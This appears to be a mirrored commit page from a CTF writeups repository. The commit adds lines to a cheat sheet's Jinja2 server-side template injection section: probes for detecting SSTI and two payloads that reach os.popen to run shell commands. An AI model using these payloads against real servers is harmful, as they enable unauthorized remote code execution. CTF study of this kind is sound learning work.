Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-08-29 14:01:41 +05:00 committed by GitHub
parent 1d8de3060a
commit 917a58e08a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
Cheat Sheet.md
View file

@ -512,10 +512,13 @@ If we can read log files,we can poison them to get RCE<br />
### SSTI (Server Side Template Injection) ### SSTI (Server Side Template Injection)
#### Jinja2 #### Jinja2
To check if it's jinja test`{{7*'7'}}` this would return 7777
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/> Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`
**Exploit** **Exploit**
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}` `{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`